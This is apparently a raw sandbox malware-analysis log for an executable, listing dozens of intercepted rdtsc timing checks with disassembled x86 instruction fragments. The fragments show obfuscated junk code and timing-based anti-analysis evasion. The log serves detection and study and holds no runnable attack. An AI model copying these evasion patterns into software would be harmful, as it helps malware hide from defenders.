                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 000000000032D511 second address: 000000000032D516 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 000000000032E519 second address: 000000000032E54B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E95375D09h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F7E95375D01h 0x00000012 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 000000000032F477 second address: 000000000032F47B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 000000000032E781 second address: 000000000032E787 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 000000000032E787 second address: 000000000032E78B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 000000000032E78B second address: 000000000032E7AC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e jmp 00007F7E95375D02h 0x00000013 popad 0x00000014 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 000000000032E7AC second address: 000000000032E7BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7E954D64AAh 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 00000000003305C1 second address: 0000000000330623 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 mov dword ptr [esp], eax 0x0000000a mov di, C8D0h 0x0000000e push 00000000h 0x00000010 call 00007F7E95375CFBh 0x00000015 mov ebx, dword ptr [ebp+12467751h] 0x0000001b pop ebx 0x0000001c push 00000000h 0x0000001e push 00000000h 0x00000020 push ebx 0x00000021 call 00007F7E95375CF8h 0x00000026 pop ebx 0x00000027 mov dword ptr [esp+04h], ebx 0x0000002b add dword ptr [esp+04h], 0000001Ah 0x00000033 inc ebx 0x00000034 push ebx 0x00000035 ret 0x00000036 pop ebx 0x00000037 ret 0x00000038 add edi, dword ptr [ebp+122D363Dh] 0x0000003e xchg eax, esi 0x0000003f push ebx 0x00000040 jmp 00007F7E95375CFDh 0x00000045 pop ebx 0x00000046 push eax 0x00000047 pushad 0x00000048 push eax 0x00000049 push edx 0x0000004a push edx 0x0000004b pop edx 0x0000004c rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000000330623 second address: 0000000000330642 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E954D64B7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c pop edi 0x0000000d rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 000000000033345F second address: 00000000003334DB instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 pushad 0x00000008 popad 0x00000009 pop edi 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d jmp 00007F7E95375D03h 0x00000012 jns 00007F7E95375CF8h 0x00000018 popad 0x00000019 nop 0x0000001a mov edi, 6C0EE7F3h 0x0000001f push 00000000h 0x00000021 mov bh, 8Fh 0x00000023 jmp 00007F7E95375D08h 0x00000028 push 00000000h 0x0000002a xor dword ptr [ebp+12462F6Bh], esi 0x00000030 jmp 00007F7E95375CFAh 0x00000035 xchg eax, esi 0x00000036 jmp 00007F7E95375D04h 0x0000003b push eax 0x0000003c push eax 0x0000003d push eax 0x0000003e push edx 0x0000003f jl 00007F7E95375CF6h 0x00000045 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 00000000003374D1 second address: 00000000003374FC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E954D64B2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F7E954D64B1h 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 00000000003374FC second address: 0000000000337500 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000000337500 second address: 0000000000337506 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000000337506 second address: 000000000033750C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 00000000002E37BC second address: 00000000002E37CA instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F7E954D64A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 00000000002E37CA second address: 00000000002E37E8 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F7E95375CF6h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F7E95375D00h 0x00000013 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000000337A89 second address: 0000000000337A8D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000000337A8D second address: 0000000000337A9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a jno 00007F7E95375CF6h 0x00000010 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 00000000003355EB second address: 00000000003355F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000000339AFD second address: 0000000000339B0E instructions: 0x00000000 rdtsc 0x00000002 jp 00007F7E95375CF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e pushad 0x0000000f popad 0x00000010 pop eax 0x00000011 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000000338C68 second address: 0000000000338C6C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 000000000033AC7D second address: 000000000033AC92 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E95375D01h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 000000000033AD1F second address: 000000000033AD31 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E954D64AEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 000000000033AD31 second address: 000000000033AD36 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000000339CE7 second address: 0000000000339CF1 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F7E954D64A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 000000000033AD36 second address: 000000000033AD5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7E95375D08h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push ecx 0x0000000e je 00007F7E95375CFCh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000000339CF1 second address: 0000000000339D1B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F7E954D64B1h 0x00000008 push eax 0x00000009 pop eax 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F7E954D64AEh 0x00000015 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 000000000033CB10 second address: 000000000033CB19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 000000000033CB19 second address: 000000000033CB1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 000000000033AE77 second address: 000000000033AE85 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jg 00007F7E95375CF6h 0x0000000e rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 00000000002E02EB second address: 00000000002E02EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 00000000002E02EF second address: 00000000002E02F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 000000000033D177 second address: 000000000033D185 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E954D64AAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 000000000033D317 second address: 000000000033D31E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 000000000033D31E second address: 000000000033D32E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F7E954D64ABh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 000000000033D32E second address: 000000000033D3BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a mov edi, esi 0x0000000c push dword ptr fs:[00000000h] 0x00000013 mov bh, dh 0x00000015 mov dword ptr fs:[00000000h], esp 0x0000001c jl 00007F7E95375CFCh 0x00000022 mov eax, dword ptr [ebp+122D0AC1h] 0x00000028 push 00000000h 0x0000002a push eax 0x0000002b call 00007F7E95375CF8h 0x00000030 pop eax 0x00000031 mov dword ptr [esp+04h], eax 0x00000035 add dword ptr [esp+04h], 00000018h 0x0000003d inc eax 0x0000003e push eax 0x0000003f ret 0x00000040 pop eax 0x00000041 ret 0x00000042 sub edi, 12C8C07Eh 0x00000048 jmp 00007F7E95375D07h 0x0000004d mov dword ptr [ebp+122D1A3Ah], ebx 0x00000053 push FFFFFFFFh 0x00000055 movzx ebx, cx 0x00000058 push eax 0x00000059 pushad 0x0000005a push edi 0x0000005b jmp 00007F7E95375CFAh 0x00000060 pop edi 0x00000061 push eax 0x00000062 push edx 0x00000063 ja 00007F7E95375CF6h 0x00000069 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 000000000033E346 second address: 000000000033E34A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 000000000033E34A second address: 000000000033E372 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F7E95375D07h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 je 00007F7E95375CF6h 0x00000016 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 000000000033E452 second address: 000000000033E457 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 000000000033E457 second address: 000000000033E45D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 000000000033E45D second address: 000000000033E461 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000000346187 second address: 000000000034618D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000000345878 second address: 000000000034587E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 00000000003459EF second address: 00000000003459FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 ja 00007F7E95375CFCh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000000345BCA second address: 0000000000345BD4 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F7E954D64A6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000000345BD4 second address: 0000000000345BDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000000345BDA second address: 0000000000345C12 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push edi 0x00000004 pop edi 0x00000005 jc 00007F7E954D64A6h 0x0000000b pop edi 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f jnp 00007F7E954D64AEh 0x00000015 jmp 00007F7E954D64B8h 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000000345C12 second address: 0000000000345C18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 000000000034BFF8 second address: 000000000034C009 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7E954D64ACh 0x00000009 popad 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 000000000034C009 second address: 000000000034C03B instructions: 0x00000000 rdtsc 0x00000002 jno 00007F7E95375CF8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007F7E95375D00h 0x00000010 mov eax, dword ptr [esp+04h] 0x00000014 pushad 0x00000015 jl 00007F7E95375CFCh 0x0000001b jnp 00007F7E95375CF6h 0x00000021 push eax 0x00000022 push edx 0x00000023 push esi 0x00000024 pop esi 0x00000025 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 000000000034C03B second address: 000000000034C04C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [eax] 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 popad 0x00000011 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 000000000034C04C second address: 000000000034C063 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 pop eax 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp+04h], eax 0x0000000e pushad 0x0000000f push ebx 0x00000010 push eax 0x00000011 pop eax 0x00000012 pop ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 push edx 0x00000016 pop edx 0x00000017 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 000000000034C063 second address: 000000000034C067 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 000000000034C127 second address: 000000000034C18E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F7E95375D04h 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push esi 0x0000000f push edi 0x00000010 pop edi 0x00000011 pop esi 0x00000012 pop eax 0x00000013 mov eax, dword ptr [esp+04h] 0x00000017 jnl 00007F7E95375D00h 0x0000001d mov eax, dword ptr [eax] 0x0000001f pushad 0x00000020 jmp 00007F7E95375D04h 0x00000025 jnp 00007F7E95375CFCh 0x0000002b jnp 00007F7E95375CF6h 0x00000031 popad 0x00000032 mov dword ptr [esp+04h], eax 0x00000036 je 00007F7E95375D04h 0x0000003c pushad 0x0000003d push eax 0x0000003e push edx 0x0000003f rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 000000000034C248 second address: 000000000034C24D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 00000000002D9799 second address: 00000000002D97AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F7E95375CFBh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 00000000002D97AF second address: 00000000002D97B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 000000000035037C second address: 0000000000350395 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E95375D01h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000000350911 second address: 0000000000350926 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e jng 00007F7E954D64A6h 0x00000014 pop eax 0x00000015 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000000350BCA second address: 0000000000350BD4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F7E95375CF6h 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000000350BD4 second address: 0000000000350C18 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F7E954D64A6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jns 00007F7E954D64A6h 0x00000013 pushad 0x00000014 popad 0x00000015 jg 00007F7E954D64A6h 0x0000001b pushad 0x0000001c popad 0x0000001d popad 0x0000001e pop edx 0x0000001f pop eax 0x00000020 pushad 0x00000021 jmp 00007F7E954D64B9h 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 popad 0x0000002a jl 00007F7E954D64A6h 0x00000030 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000000350C18 second address: 0000000000350C1C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000000350C1C second address: 0000000000350C26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000000350D9B second address: 0000000000350D9F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000000350EED second address: 0000000000350EF2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000000351039 second address: 000000000035103F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 000000000035103F second address: 0000000000351049 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000000351049 second address: 0000000000351077 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pushad 0x00000008 push ebx 0x00000009 jmp 00007F7E95375CFFh 0x0000000e jmp 00007F7E95375D02h 0x00000013 pop ebx 0x00000014 push edi 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000000351326 second address: 000000000035134B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7E954D64B2h 0x00000009 popad 0x0000000a jnp 00007F7E954D64B2h 0x00000010 jng 00007F7E954D64A6h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 00000000002D7D7D second address: 00000000002D7D8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 popad 0x00000008 push esi 0x00000009 pushad 0x0000000a jnp 00007F7E95375CF6h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000000329FD7 second address: 0000000000329FDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000000329FDB second address: 0000000000329FE5 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F7E95375CF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000000329FE5 second address: 0000000000329FF7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7E954D64AEh 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000000329FF7 second address: 0000000000329FFB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000000329FFB second address: 00000000003078E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b mov dx, 1E00h 0x0000000f call dword ptr [ebp+122D1822h] 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F7E954D64B7h 0x0000001c push ecx 0x0000001d pushad 0x0000001e popad 0x0000001f ja 00007F7E954D64A6h 0x00000025 pop ecx 0x00000026 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 000000000032A19D second address: 000000000032A1A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 000000000032A4D6 second address: 000000000016F99D instructions: 0x00000000 rdtsc 0x00000002 jne 00007F7E954D64A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e mov edx, 7237456Ah 0x00000013 push dword ptr [ebp+122D0FD1h] 0x00000019 clc 0x0000001a mov edi, dword ptr [ebp+122D381Dh] 0x00000020 call dword ptr [ebp+122D2E8Ah] 0x00000026 pushad 0x00000027 pushad 0x00000028 or edx, 3C219123h 0x0000002e and eax, dword ptr [ebp+122D3885h] 0x00000034 popad 0x00000035 mov dword ptr [ebp+122D2E6Ah], ebx 0x0000003b xor eax, eax 0x0000003d jmp 00007F7E954D64B3h 0x00000042 mov edx, dword ptr [esp+28h] 0x00000046 mov dword ptr [ebp+122D2D51h], ecx 0x0000004c mov dword ptr [ebp+122D38B1h], eax 0x00000052 cld 0x00000053 mov esi, 0000003Ch 0x00000058 cmc 0x00000059 add esi, dword ptr [esp+24h] 0x0000005d jmp 00007F7E954D64B8h 0x00000062 lodsw 0x00000064 jmp 00007F7E954D64B5h 0x00000069 add eax, dword ptr [esp+24h] 0x0000006d jmp 00007F7E954D64B4h 0x00000072 mov ebx, dword ptr [esp+24h] 0x00000076 cld 0x00000077 push eax 0x00000078 push eax 0x00000079 push edx 0x0000007a push eax 0x0000007b push edx 0x0000007c pushad 0x0000007d popad 0x0000007e rdtsc
